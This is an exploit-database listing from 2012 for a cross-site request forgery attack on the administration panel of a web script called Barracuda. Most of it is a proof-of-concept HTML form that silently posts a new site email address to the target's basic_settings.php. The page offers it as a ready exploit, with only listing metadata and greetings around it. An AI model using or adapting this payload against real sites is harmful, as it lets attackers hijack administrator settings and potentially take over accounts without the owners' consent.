Barracuda CSRF (change e-mail address)



EKU-ID: 1644 CVE: OSVDB-ID:
Author: Jonturk75 Published: 2012-03-13 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


# Exploit Title: Barracuda CSRF (change e-mail address)
# Author: Jonturk75
# Vendor or Software Link: http://www.scripts.com/viewscript/barracuda/19576/
# Category::  webapps
# Demo : http://demo.boonex.com/administration/
# Greetz: Inj3ct0r Exploit DataBase 1337day.com


<form  id="adm-settings-form" name="adm-settings-form" action="target.com/[PATH]/administration/basic_settings.php" method="post" enctype="multipart/form-data" class="form_advanced">
<input type="hidden" value="mail@mail.com" name="site_email" class="form_input_text"/>
<input type="submit" value="Save" name="save" class="form_input_submit"/>